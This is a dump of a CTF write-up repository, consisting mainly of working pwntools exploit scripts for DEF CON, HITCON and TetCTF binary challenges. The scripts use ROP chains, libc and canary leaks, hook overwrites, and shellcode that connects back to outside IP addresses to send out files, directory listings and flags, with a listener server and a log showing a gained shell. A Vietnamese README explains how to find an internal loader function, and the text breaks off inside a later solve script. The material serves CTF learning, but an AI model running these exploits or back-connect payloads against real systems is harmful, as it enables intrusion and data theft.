p64(0xae000) 108 | payload += p64(pop_rdx) 109 | payload += p64(7) 110 | payload += p64(pop_rdi) 111 | payload += p64(base_text) 112 | payload += p64(mprotect) 113 | payload += p64(pop_rdi) 114 | payload += p64(0) 115 | payload += p64(pop_rsi) 116 | payload += p64(base_text+0x500) 117 | payload += p64(pop_rdx) 118 | payload += p64(0x100) 119 | payload += p64(read) 120 | payload += p64(base_text+0x500) 121 | r.sendline(payload) 122 | time.sleep(2) 123 | r.sendline(asm(shellcraft.amd64.linux.sh())) 124 | r.interactive() 125 | -------------------------------------------------------------------------------- /2019/defcon/speedrun/speedrun-001/speedrun-001: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2019/defcon/speedrun/speedrun-001/speedrun-001 -------------------------------------------------------------------------------- /2019/defcon/speedrun/speedrun-001/speedrun-001.1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2019/defcon/speedrun/speedrun-001/speedrun-001.1 -------------------------------------------------------------------------------- /2019/defcon/speedrun/speedrun-001/speedrun-001.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | import sys 4 | import os 5 | 6 | def speedrun_001(DEBUG): 7 | 8 | context.arch = "amd64" 9 | binname = './speedrun-001' 10 | elf = ELF(binname) 11 | rop = ROP(elf) 12 | 13 | if DEBUG=="1": 14 | r = process(binname) 15 | # raw_input("debug?") 16 | elif DEBUG=="2": 17 | HOST = 'speedrun-001.quals2019.oooverflow.io' 18 | PORT = 31337 19 | r = remote(HOST,PORT) 20 | 21 | def find_gadget(gadget): 22 | gadgets = gadget.split(" ; ") 23 | found = rop.find_gadget(gadgets) 24 | if found == None: 25 | if sum(1 for _ in elf.search(asm(gadget)))==0: 26 | return None 27 | return next(elf.search(asm(gadget))) 28 | else: 29 | return rop.find_gadget(gadgets).address 30 | 31 | def find_stack_prot(): 32 | data_rel_ro = elf.get_section_by_name(".data.rel.ro").header 33 | data_rel_ro_sh_addr = data_rel_ro.sh_addr 34 | data_rel_ro_sh_size = data_rel_ro.sh_size 35 | __stack_prot = data_rel_ro_sh_addr+data_rel_ro_sh_size-4 36 | return __stack_prot 37 | 38 | def xref(search): 39 | data = os.popen('objdump -M intel -z --prefix-address -d "speedrun-001" | grep "%s"' % search).read().strip().splitlines() 40 | return data 41 | 42 | def find_dl_make_stack_executable(__stack_prot): 43 | xref_result = xref(hex(__stack_prot)[2:])[1] 44 | return int(xref_result.split(" ")[0],16)-32 45 | 46 | def find__libc_stack_end(_dl_make_stack_executable): 47 | xref_result = xref(hex(_dl_make_stack_executable+23)[2:])[0].split("# ")[1] 48 | return int(xref_result.split(" ")[0],16) 49 | 50 | def exploit_stack_overflow_static_binary(buffsize): 51 | pop_rax_rdx_rbx = find_gadget('pop rax ; pop rdx ; pop rbx ; ret') 52 | mov_dword_rdx_rax = find_gadget('mov dword ptr [rdx], eax ; ret') 53 | pop_rdi = find_gadget('pop rdi ; ret') 54 | call_rsp = find_gadget('call rsp') 55 | 56 | __stack_prot = find_stack_prot() 57 | _dl_make_stack_executable = find_dl_make_stack_executable(__stack_prot) 58 | __libc_stack_end = find__libc_stack_end(_dl_make_stack_executable) 59 | 60 | log.info("_dl_make_stack_executable: %#x" % _dl_make_stack_executable) 61 | log.info("__stack_prot: %#x" % __stack_prot) 62 | log.info("__libc_stack_end: %#x" % __libc_stack_end) 63 | log.info("pop_rax_rdx_rbx: %#x" % pop_rax_rdx_rbx) 64 | log.info("mov_dword_rdx_rax: %#x" % mov_dword_rdx_rax) 65 | log.info("pop_rdi: %#x" % pop_rdi) 66 | log.info("call_rsp: %#x" % call_rsp) 67 | shellcode = asm(pwnlib.shellcraft.amd64.linux.sh()) 68 | payload = "A"*buffsize 69 | payload += "B"*8 # rbp 70 | payload += p64(pop_rax_rdx_rbx) 71 | payload += p64(7) # rax 72 | payload += p64(__stack_prot) # rdx 73 | payload += p64(0) # rbx 74 | payload += p64(mov_dword_rdx_rax) # __stack_prot = 7 75 | payload += p64(pop_rdi) 76 | payload += p64(__libc_stack_end) 77 | payload += p64(_dl_make_stack_executable) 78 | payload += p64(call_rsp) 79 | payload += shellcode 80 | r.send(payload) 81 | 82 | exploit_stack_overflow_static_binary(buffsize=0x400) 83 | 84 | r.interactive() 85 | 86 | speedrun_001(sys.argv[1]) 87 | 88 | # OOO{Ask any pwner. Any real pwner. It don't matter if you pwn by an inch or a m1L3. pwning's pwning.} -------------------------------------------------------------------------------- /2019/hitcon_quals/trick_or_treat/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2019/hitcon_quals/trick_or_treat/libc.so.6 -------------------------------------------------------------------------------- /2019/hitcon_quals/trick_or_treat/trick_or_treat: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2019/hitcon_quals/trick_or_treat/trick_or_treat -------------------------------------------------------------------------------- /2019/hitcon_quals/trick_or_treat/trick_or_treat.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | import sys 4 | 5 | 6 | def trick_or_treat(DEBUG): 7 | if DEBUG=="1": 8 | libc_file = ELF("/lib/x86_64-linux-gnu/libc.so.6") 9 | r = process("./trick_or_treat") # debug with libc of system 10 | raw_input("debug?") 11 | elif DEBUG=="2": 12 | libc_file = ELF("./libc.so.6") 13 | r = process("./trick_or_treat",env={"LD_PRELOAD":"./libc.so.6"}) # debug with libc.so.6 14 | raw_input("debug?") 15 | elif DEBUG=="3": 16 | libc_file = ELF("./libc.so.6") 17 | HOST = '3.112.41.140' 18 | PORT = 56746 19 | r = remote(HOST,PORT) # remote expoit 20 | 21 | r.sendlineafter("Size:","100000000") 22 | """ 23 | magic = malloc(100000000) = 0x7ffff1a85010 24 | 0x7ffff1a85000 0x7ffff79e4000 rw-p 5f5f000 0 25 | 0x7ffff79e4000 0x7ffff7bcb000 r-xp 1e7000 0 /home/phieulang/ctf/2019/HITCON/trick/libc.so.6 26 | """ 27 | r.recvuntil("Magic:") 28 | addr = int(r.recvuntil("\n").strip(),16) 29 | libc = addr + 0x5f5eff0 # 0x7ffff79e4000 (libc) - 0x7ffff1a85010 (magic) = 0x5f5eff0 30 | __malloc_hook = libc +libc_file.symbols["__malloc_hook"] 31 | __free_hook = libc + libc_file.symbols["__free_hook"] 32 | one_gadget = libc + 0x10a38c # fail with remote environment 33 | puts = libc + libc_file.symbols["puts"] # to confirm __free_hook triggered 34 | system = libc + libc_file.symbols["system"] 35 | log.info("address: %#x", addr) 36 | log.info("libc: %#x", libc) 37 | log.info("__malloc_hook: %s" % hex(__malloc_hook)) 38 | log.info("__free_hook: %s" % hex(__free_hook)) 39 | log.info("puts: %s" % hex(puts)) 40 | log.info("one_gadget: %s" % hex(one_gadget)) 41 | 42 | r.recvuntil("Offset & Value:\x00") 43 | offset = (__free_hook - addr) // 8 44 | r.sendline(hex(offset) + " " + hex(system)) # overwrite __free_hook with puts function address 45 | 46 | r.recvuntil("Offset & Value:\x00") 47 | payload = "2"*1024 # trigger malloc + free => __free_hook 48 | # https://code.woboq.org/userspace/glibc/stdio-common/vfscanf-internal.c.html#736 49 | payload += " " 50 | payload += "ed" # system("ed") 51 | # https://www.gnu.org/software/ed/manual/ed_manual.html 52 | r.sendline(payload) 53 | 54 | r.sendline("! id") 55 | r.sendline("! cat home/trick_or_treat/flag") 56 | r.interactive() 57 | 58 | trick_or_treat(sys.argv[1]) 59 | """ 60 | $ python trick_or_treat.py 3 61 | [*] '/home/phieulang/ctf/2019/HITCON/trick/libc.so.6' 62 | Arch: amd64-64-little 63 | RELRO: Partial RELRO 64 | Stack: Canary found 65 | NX: NX enabled 66 | PIE: PIE enabled 67 | [+] Opening connection to 3.112.41.140 on port 56746: Done 68 | [*] address: 0x7f7057649010 69 | [*] libc: 0x7f705d5a8000 70 | [*] __malloc_hook: 0x7f705d993c30 71 | [*] __free_hook: 0x7f705d9958e8 72 | [*] puts: 0x7f705d6289c0 73 | [*] one_gadget: 0x7f705d6b238c 74 | [*] Switching to interactive mode 75 | uid=1001(trick_or_treat) gid=1001(trick_or_treat) groups=1001(trick_or_treat) 76 | ! 77 | hitcon{T1is_i5_th3_c4ndy_for_yoU} 78 | ! 79 | $ 80 | """ 81 | -------------------------------------------------------------------------------- /2019/tetctf.cf/babyfirst/babyfirst: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2019/tetctf.cf/babyfirst/babyfirst -------------------------------------------------------------------------------- /2019/tetctf.cf/babyfirst/babyfirst.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | import sys 4 | 5 | def babyfirst(DEBUG): 6 | if DEBUG=="1": 7 | offset___libc_start_main_ret = 0x20830 8 | offset_puts = 0x000000000006f690 9 | offset_ret = 0x937 10 | offset_pop_rdi = 0x21102 11 | offset_system = 0x45390 12 | offset_str_bin_sh = 0x18cd57 13 | offset_one_gadget = 0xf02a4 # [rsp+0x50] 14 | r = process("./babyfirst") 15 | raw_input("debug?") 16 | elif DEBUG=="2": 17 | offset___libc_start_main_ret = 0x21b97 18 | offset_ret = 0x8aa 19 | offset_puts = 0x809c0 20 | offset_pop_rdi = 0x2155f 21 | offset_system = 0x4f440 22 | offset_str_bin_sh = 0x1B3E9A 23 | # offset_one_gadget = 0x4f322 # [rsp+0x40] 24 | offset_one_gadget = 0x4f2c5 # rcx = null 25 | HOST = 'babyfirst.chung96vn.cf' 26 | PORT = 31337 27 | r = remote(HOST,PORT) 28 | 29 | def menu(): 30 | return r.recvuntil("Your choice: ") 31 | 32 | def Login(username, password): 33 | r.sendline("1") 34 | r.recvuntil("User Name: ") 35 | r.send(username) 36 | if "admin" in username: 37 | r.recvuntil("Password: ") 38 | r.send(password) 39 | return menu() 40 | 41 | def Leak(): 42 | r.sendline("2") 43 | r.recvuntil("Welcome: ") 44 | res = r.recvuntil("\nTest Version only support for admin~") 45 | menu() 46 | return res 47 | 48 | def Play(): 49 | r.sendline("2") 50 | r.recvuntil("Content: ") 51 | 52 | def BOF(content): 53 | r.send(content) 54 | return r.recvline() 55 | 56 | 57 | offset_main = 0xf2d 58 | offset_bss = 0x202500 59 | menu() 60 | username = "A"*0x10 61 | username = username.ljust(0x20,"A") 62 | password = "B"*0x20 63 | Login(username, password) 64 | Login(username, password) 65 | 66 | password = Leak()[0x20:0x40] 67 | Login("admin\n",password) 68 | Play() 69 | canary = u64("\x00"+BOF("A"*0x29)[0x29:0x29+7]) 70 | log.info("canary: %#x", canary) 71 | 72 | main = u64(BOF("A"*0x38)[0x38:0x38+6].ljust(8,"\x00"))-96 73 | log.info("main: %#x", main) 74 | binbase = main - offset_main 75 | log.info("binbase: %#x", binbase) 76 | 77 | bss = binbase + offset_bss 78 | 79 | __libc_start_main_ret = u64(BOF("A"*0x68)[0x68:0x68+6].ljust(8,"\x00")) 80 | log.info("__libc_start_main_ret: %#x", __libc_start_main_ret) 81 | 82 | libc = __libc_start_main_ret - offset___libc_start_main_ret 83 | one_gadget = libc + offset_one_gadget 84 | system = libc + offset_system 85 | str_bin_sh = libc + offset_str_bin_sh 86 | pop_rdi = libc + offset_pop_rdi 87 | puts = libc + offset_puts 88 | ret = libc + offset_ret 89 | log.info("libc: %#x", libc) 90 | log.info("one_gadget: %#x", one_gadget) 91 | log.info("puts: %#x", puts) 92 | 93 | payload = "END" 94 | payload = payload.ljust(0x28, "A") 95 | payload += p64(canary) 96 | payload += p64(bss) # rbp 97 | payload += p64(ret) # agliment rsp (https://stackoverflow.com/questions/11298230/sse-instruction-need-the-data-aligned) 98 | # payload += p64(one_gadget) # ret 99 | payload += p64(pop_rdi) # ret 100 | payload += p64(str_bin_sh) 101 | payload += p64(system) 102 | BOF(payload) 103 | 104 | 105 | r.interactive() 106 | 107 | babyfirst(sys.argv[1]) -------------------------------------------------------------------------------- /2019/tetctf.cf/babyfirst/libc-2.27.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2019/tetctf.cf/babyfirst/libc-2.27.so -------------------------------------------------------------------------------- /2019/tetctf.cf/sandbox/README.md: -------------------------------------------------------------------------------- 1 | # sandbox 2 | ``` 3 | Sơ bộ về chương trình các bạn có thể đọc tại các writeup: 4 | https://blog.efiens.com/tetctf-2/ 5 | https://medium.com/@nghthach98/write-up-for-pwnable-challenges-tetctf-2019-a74eb177518e 6 | ``` 7 | Ở đây mình sẽ chỉ 1 cách để các bạn tìm được hàm _dl_make_stack_executable nhanh hơn. 8 | 9 | ta code 1 chương trình đơn giản như sau: 10 | ```c 11 | #include 12 | #include 13 | 14 | int main(){ 15 | printf("ledangquynhnhu"); 16 | } 17 | ``` 18 | Compile: 19 | ``` 20 | gcc test.c -o test -static 21 | ``` 22 | 23 | Mở bằng IDA tìm hàm _dl_make_stack_executable. 24 | ```c 25 | unsigned int __fastcall dl_make_stack_executable(_QWORD *a1) 26 | { 27 | __int64 v1; // rdx 28 | _QWORD *v2; // rax 29 | signed __int64 v3; // rdi 30 | _QWORD *v4; // rbx 31 | unsigned int result; // eax 32 | 33 | v1 = *a1; 34 | v2 = a1; 35 | v3 = *a1 & -dl_pagesize; 36 | if ( v1 != _libc_stack_end ) 37 | return 1; 38 | v4 = v2; 39 | result = mprotect(v3, dl_pagesize, _stack_prot); 40 | if ( result ) 41 | return __readfsdword(0xFFFFFFD0); 42 | *v4 = 0LL; 43 | dl_stack_flags |= 1u; 44 | return result; 45 | } 46 | ``` 47 | Click double vào `_stack_prot` ta thấy biến này nằm ở cuối segment `.data.rel.ro` và có giá trị là `0x1000000`. 48 | 49 | Xrefs _stack_prot ta thấy chỉ có 2 hàm dùng tới nó là `_dl_map_object_from_fd_constprop_9` và `_dl_make_stack_executable`. 50 | 51 | Trong đó `_dl_make_stack_executable` sử dụng duy nhất 1 tham số để so sánh với `_libc_stack_end` 52 | 53 | Ta thấy trong chương trình chỉ có 1 segment `.data.rel.ro`. 54 | 55 | Áp dụng sang trường hợp binary `program` của bài ta dùng shift f7 trên IDA để mở danh sách các segment, dò xuống ta click vào segment LOAD tại địa chỉ 0x6B8EF4 nằm ngay dưới segment `.data.rel.ro` lăn chuột lên chút ta thấy ngay `.data.rel.ro:00000000006B8EF0 dword_6B8EF0 dd 1000000h`. 56 | 57 | Như vậy `dword_6B8EF0` chính là `_stack_prot`, rename lại rồi xrefs ta thấy có 2 hàm dùng tới `_stack_prot` là `sub_476560` và `sub_47F780`. 58 | 59 | Xem qua 2 hàm thì chỉ có `sub_47F780` sử dụng 1 tham số nên xác định hàm này là `_dl_make_stack_executable`. 60 | 61 | ```c 62 | unsigned int __fastcall dl_make_stack_executable(_QWORD *a1) 63 | { 64 | _QWORD *v1; // rbx 65 | __int64 v2; // rdx 66 | __int64 v3; // rdi 67 | unsigned int result; // eax 68 | 69 | v1 = a1; 70 | v2 = *a1; 71 | v3 = *a1 & -qword_6BA1F8; 72 | if ( v2 != qword_6B8AB0 ) 73 | return 1; 74 | result = sub_44A0C0(v3, qword_6BA1F8, stack_prot); 75 | if ( result ) 76 | return __readfsdword(0xFFFFFFC0); 77 | *v1 = 0LL; 78 | dword_6BA1E8 |= 1u; 79 | return result; 80 | } 81 | ``` 82 | `a1` được so sánh với `qword_6B8AB0` => `qword_6B8AB0` chính là `_libc_stack_end`. 83 | 84 | Vậy ta đã có đủ dữ kiện để dùng được `_dl_make_stack_executable`. 85 | 86 | Lần sau không cần phải compile kiểm tra nữa mà ta cứ mở IDA lên tìm segment `LOAD` ngay dưới `.data.rel.ro` là tìm được `stack_prot` là tìm được `_dl_make_stack_executable`. 87 | -------------------------------------------------------------------------------- /2019/tetctf.cf/sandbox/program: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2019/tetctf.cf/sandbox/program -------------------------------------------------------------------------------- /2019/tetctf.cf/sandbox/sandbox: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2019/tetctf.cf/sandbox/sandbox -------------------------------------------------------------------------------- /2019/tetctf.cf/sandbox/sandbox.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | import sys 4 | 5 | def sandbox(DEBUG): 6 | if DEBUG=="1": 7 | offset_one_gadget = 0xf02a4 # [rsp+0x50] 8 | r = process(["./sandbox","./program"]) 9 | raw_input("debug?") 10 | elif DEBUG=="2": 11 | offset_one_gadget = 0xf02a4 # [rsp+0x50] 12 | r = process("./program") 13 | raw_input("debug?") 14 | elif DEBUG=="3": 15 | # offset_one_gadget = 0x4647c # [rsp+0x30] 16 | offset_one_gadget = 0xe9415 # [rsp+0x50] 17 | # offset_one_gadget = 0xea36d # [rsp+0x70] 18 | HOST = 'sandbox.chung96vn.cf' 19 | PORT = 1337 20 | r = remote(HOST,PORT) 21 | 22 | def pause(): 23 | # time.sleep(0.05) 24 | raw_input("?") 25 | 26 | context.arch = "amd64" 27 | pop_rax_rdx_rbx = 0x4816b6 # pop rax ; pop rdx ; pop rbx ; ret 28 | mov_dword_rdx_rax = 0x417e08 # mov dword ptr [rdx], eax ; ret 29 | pop_rdi = 0x400686 30 | call_rsp = 0x44a1d1 31 | 32 | __stack_prot = 0x6B8EF0 33 | __libc_stack_end = 0x6B8AB0 34 | _dl_make_stack_executable = 0x47F780 35 | 36 | shellcode = "" 37 | shellcode += asm(""" /* open new socket */ 38 | /* call socket(2, Constant('SOCK_STREAM', 0x1), 0) */ 39 | push SYS_socket /* 0x29 */ 40 | pop rax 41 | push 2 42 | pop rdi 43 | push SOCK_STREAM /* 1 */ 44 | pop rsi 45 | cdq /* rdx=0 */ 46 | syscall 47 | 48 | /* Put socket into rbp */ 49 | mov rbp, rax 50 | 51 | /* Create address structure on stack */ 52 | /* push '\x02\x00\x04\xd2\x7f\x00\x00\x01' */ 53 | mov rax, 0x101010101010101 54 | push rax 55 | mov rax, 0x101010101010101 ^ 0x3cc6881239050002 56 | xor [rsp], rax 57 | 58 | /* Connect the socket */ 59 | /* call connect('rbp', 'rsp', 16) */ 60 | push SYS_connect /* 0x2a */ 61 | pop rax 62 | mov rdi, rbp 63 | push 0x10 64 | pop rdx 65 | mov rsi, rsp 66 | syscall 67 | 68 | mov rdx, 0x200 69 | syscall 70 | """) 71 | """ 72 | pwnlib.shellcraft.amd64.linux.connect("18.136.198.60", 1337) 73 | sys_read(fd, rsp, 0x200) 74 | """ 75 | 76 | payload = "A"*0x30 77 | payload += "B"*8 78 | payload += p64(pop_rax_rdx_rbx) 79 | payload += p64(7) # rax 80 | payload += p64(__stack_prot) # rdx 81 | payload += p64(0) # rbx 82 | payload += p64(mov_dword_rdx_rax) 83 | payload += p64(pop_rdi) 84 | payload += p64(__libc_stack_end) 85 | payload += p64(_dl_make_stack_executable) 86 | payload += p64(call_rsp) 87 | payload += shellcode 88 | 89 | r.send(payload) 90 | 91 | 92 | r.interactive() 93 | 94 | sandbox(sys.argv[1]) -------------------------------------------------------------------------------- /2019/tetctf.cf/sandbox/server.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import socket 3 | import threading 4 | # context.arch = "amd64" 5 | 6 | 7 | def shellExec(): 8 | shellcode = "90"*0x50 9 | shellcode += "6a22415a6aff41584531c96a0958bf0101010181f7010105016a075abe0101010181f6012101010f0531c031ff31d2b605be0101010181f6010105010f054831e4bc0005040067c74424042300000067c7042400000400cb" 10 | shellcode = shellcode.decode("hex") 11 | return shellcode 12 | """ 13 | 0: 6a 22 push 0x22 14 | 2: 41 inc ecx 15 | 3: 5a pop edx 16 | 4: 6a ff push 0xffffffff 17 | 6: 41 inc ecx 18 | 7: 58 pop eax 19 | 8: 45 inc ebp 20 | 9: 31 c9 xor ecx,ecx 21 | b: 6a 09 push 0x9 22 | d: 58 pop eax 23 | e: bf 01 01 01 01 mov edi,0x1010101 24 | 13: 81 f7 01 01 05 01 xor edi,0x1050101 25 | 19: 6a 07 push 0x7 26 | 1b: 5a pop edx 27 | 1c: be 01 01 01 01 mov esi,0x1010101 28 | 21: 81 f6 01 21 01 01 xor esi,0x1012101 29 | 27: 0f 05 syscall 30 | /* SYS_mmap(0x40000, 0x2000, 0x7, 0x22, -1, 0) */ 31 | 29: 31 c0 xor eax,eax 32 | 2b: 31 ff xor edi,edi 33 | 2d: 31 d2 xor edx,edx 34 | 2f: b6 05 mov dh,0x5 35 | 31: be 01 01 01 01 mov esi,0x1010101 36 | 36: 81 f6 01 01 05 01 xor esi,0x1050101 37 | 3c: 0f 05 syscall 38 | /* SYS_read(0, 0x40000, 0x500) */ 39 | 3e: 48 dec eax 40 | 3f: 31 e4 xor esp,esp 41 | 41: bc 00 05 04 00 mov esp,0x40500 42 | 46: 67 c7 44 24 04 23 00 mov DWORD PTR [si+0x24],0x2304 43 | 4d: 00 44 | 4e: 00 67 c7 add BYTE PTR [edi-0x39],ah 45 | 51: 04 24 add al,0x24 46 | 53: 00 00 add BYTE PTR [eax],al 47 | 55: 04 00 add al,0x0 48 | 57: cb retf 49 | /* switch mode */ 50 | """ 51 | 52 | 53 | s = server(1337) 54 | server_conn = s.next_connection() 55 | server_conn.send(shellExec()) 56 | raw_input("?") 57 | path = "/home/sandbox/flag" 58 | payload = asm(pwnlib.shellcraft.open(path), arch = 'i386', os = 'linux') 59 | payload += asm(shellcraft.read(1, 0x40500, 0xff), arch = 'i386', os = 'linux') 60 | payload += asm(shellcraft.write(0, 0x40500, 0xff), arch = 'i386', os = 'linux') 61 | server_conn.send(payload) 62 | server_conn.interactive() -------------------------------------------------------------------------------- /2019/tetctf.cf/sandbox/test: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2019/tetctf.cf/sandbox/test -------------------------------------------------------------------------------- /2019/tetctf.cf/sandbox/test.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | int main(){ 5 | printf("ledangquynhnhu"); 6 | } 7 | -------------------------------------------------------------------------------- /2020/tetctf/babyarmshellcode/binary/babyfmt/babyfmt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2020/tetctf/babyarmshellcode/binary/babyfmt/babyfmt -------------------------------------------------------------------------------- /2020/tetctf/babyarmshellcode/binary/babyfmt/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | # 3 | 4 | timeout 10 /home/babyfmt/babyfmt 5 | 6 | -------------------------------------------------------------------------------- /2020/tetctf/babyarmshellcode/binary/babyshellcode/babyshellcode: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2020/tetctf/babyarmshellcode/binary/babyshellcode/babyshellcode -------------------------------------------------------------------------------- /2020/tetctf/babyarmshellcode/binary/babyshellcode/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | # 3 | 4 | #timeout 60 /home/babyshellcode/babyshellcode 5 | /home/babyshellcode/babyshellcode 6 | 7 | 8 | -------------------------------------------------------------------------------- /2020/tetctf/babyarmshellcode/solution/babyshellcode.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | import sys 4 | 5 | context.arch = "thumb" 6 | 7 | def babyshellcode(DEBUG): 8 | if DEBUG=="1": 9 | r = process("./babyshellcode") 10 | # raw_input("debug?") 11 | elif DEBUG=="2": 12 | HOST = '212.47.229.147' 13 | PORT = 9999 14 | r = remote(HOST,PORT) 15 | 16 | def calc(addr): 17 | addr_h = hex(addr)[2:] 18 | res = "c"+addr_h[0]+"f2"+addr_h[2:]+addr_h[1]+"2" 19 | return res.decode("hex") 20 | 21 | def sock_send(size): 22 | payload = asm(shellcraft.read("r10", 'sp', size)) 23 | payload += asm(shellcraft.write("r6", 'sp', size)) 24 | return payload 25 | 26 | def sock_recv(size): 27 | payload = asm(shellcraft.read("r6", 'sp', size)) 28 | payload += asm(shellcraft.write("r10", 'sp', size)) 29 | return payload 30 | 31 | def fmt_read(): 32 | return asm(shellcraft.read("r6", 'sp', 0x100)) 33 | 34 | 35 | def shellcode_getFlag(): 36 | payload = "\x00\x00\x00\x00\x50\x90\x50\x90\x50\x90\x50\x90" 37 | payload += asm(pwnlib.shellcraft.arm.linux.connect("157.230.46.201", 1337)) # r10 38 | payload += asm("mov r10, r6") 39 | payload += asm(pwnlib.shellcraft.arm.linux.connect("127.0.0.1", 8888)) # r6 40 | payload += fmt_read() 41 | payload += sock_send(9) # "%52$p---" 42 | payload += sock_recv(11) # 0x48e010 43 | payload += fmt_read() 44 | payload += sock_send(0xc) # get flag 45 | payload += sock_recv(0x100) 46 | return payload 47 | 48 | def shellcode_readFile(): 49 | filename = "/etc/passwd" 50 | # filename = "/home/babyfmt/babyfmt" 51 | payload = "\x00\x00\x00\x00\x50\x90\x50\x90\x50\x90\x50\x90" 52 | payload += asm(pwnlib.shellcraft.arm.linux.connect("157.230.46.201", 1337)) 53 | payload += asm(pwnlib.shellcraft.arm.linux.cat(filename,"r6")) 54 | return payload 55 | 56 | def shellcode_readdir(): 57 | dirname = "/etc/xinetd.d" 58 | payload = "\x00\x00\x00\x00\x50\x90\x50\x90\x50\x90\x50\x90" 59 | payload += "\x00"*0x20 60 | payload += asm(pwnlib.shellcraft.arm.linux.connect("157.230.46.201", 1337)) 61 | payload += asm("mov r10, r6") 62 | # O_RDONLY|O_NONBLOCK|O_DIRECTORY|O_CLOEXEC = 0x84800 63 | payload += asm(pwnlib.shellcraft.open(dirname,0x84800,0x11f3bf00)) 64 | payload += asm("sub r9, sp, #12288") 65 | payload += asm(shellcraft.arm.linux.syscall('SYS_getdents', "r0", "r9", 0x2000, 0)) 66 | payload += asm(shellcraft.write("r10", 'r9', 0x2000)) 67 | payload += asm(pwnlib.shellcraft.arm.linux.echo("---","r10")) 68 | return payload 69 | 70 | r.recvuntil("Your secret: ") 71 | 72 | # payload = shellcode_readFile() 73 | # payload = shellcode_getFlag() # fmt 74 | payload = shellcode_readdir() # readdir 75 | r.sendline(payload) 76 | r.recvuntil("Small leak: ") 77 | leak = int(r.recvuntil("\n").strip(),16) >> 16 78 | payload = calc(leak) + "\x7d\x46\x28\x47\x22\x26\xe0\xe1\x02\x26\xe0\xe1\x01\x20\x82\xe2\x01\x50\x8f\xe2\x15\xff\x2f\xe1\x04\x32\x10\x1c\x08\x4b\x00\x21\x21\x27\x01\xdf\x76\x40\x0e\x3e\xb0\x42\xe9\xd0\x14\x68\x9c\x42\xf2\xd1\x15\x1d\x2c\x68\x9c\x42\xee\xd1\x05\x35\x28\x47\x00\x00\x50\x90\x50\x90" 79 | r.sendline(payload) 80 | r.interactive() 81 | 82 | babyshellcode(sys.argv[1]) -------------------------------------------------------------------------------- /2020/tetctf/babyarmshellcode/solution/server_backconnect.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | import sys 4 | 5 | context.arch = "thumb" 6 | def fmt(): 7 | r = listen(1337) 8 | payload = "%52$p---" 9 | r.sendline(payload) 10 | flagaddr = int(r.recvuntil("---")[:-3],16) + 0x78 11 | # print hex(flagaddr) 12 | payload = "%7$s" 13 | payload = payload.ljust(8,"X") 14 | payload += p32(flagaddr) 15 | r.sendline(payload) 16 | 17 | r.interactive() 18 | 19 | def readdir(): 20 | dtypes = {} 21 | dtypes["\x04"] = "DT_DIR" 22 | dtypes["\x0a"] = "DT_LNK" 23 | dtypes["\x08"] = "DT_REG" 24 | 25 | r = listen(1337) 26 | data = r.recvuntil("---") 27 | bpos = 0 28 | while 1: 29 | ino = u32(data[bpos:bpos+4]) 30 | off_t = u32(data[bpos+4:bpos+8]) 31 | idx = data.find("\x00",bpos+10) 32 | if bpos+10==idx: 33 | break 34 | d_reclen = u16(data[bpos+8:bpos+10]) 35 | d_type = data[bpos+d_reclen-1] 36 | log.info("%s\t%s" % (data[bpos+10:idx],dtypes[d_type])) 37 | bpos += d_reclen 38 | 39 | readdir() 40 | fmt() -------------------------------------------------------------------------------- /2020/tetctf/babyarmshellcode/xinetd.d/babyfmt_xinetd: -------------------------------------------------------------------------------- 1 | service babyfmt 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/babyfmt/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = babyfmt 10 | only_from = 127.0.0.1 11 | port = 8888 12 | flags = REUSE 13 | per_source = 5 14 | rlimit_cpu = 3 15 | nice = 18 16 | } 17 | -------------------------------------------------------------------------------- /2020/tetctf/babyarmshellcode/xinetd.d/babyshellcode_xinetd: -------------------------------------------------------------------------------- 1 | service babyshellcode 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/babyshellcode/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = babyshellcode 10 | host = 0.0.0.0 11 | port = 9999 12 | flags = REUSE 13 | per_source = 5 14 | rlimit_cpu = 3 15 | nice = 18 16 | } 17 | -------------------------------------------------------------------------------- /2021/ISITDTU_final/solve.py: -------------------------------------------------------------------------------- 1 | import argparse 2 | import sys 3 | import requests 4 | import base64 5 | from pwn import * 6 | import string 7 | import random 8 | 9 | 10 | def readfile(filename, url, username = "a", password = "S"): 11 | t = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(3)) 12 | request_url = 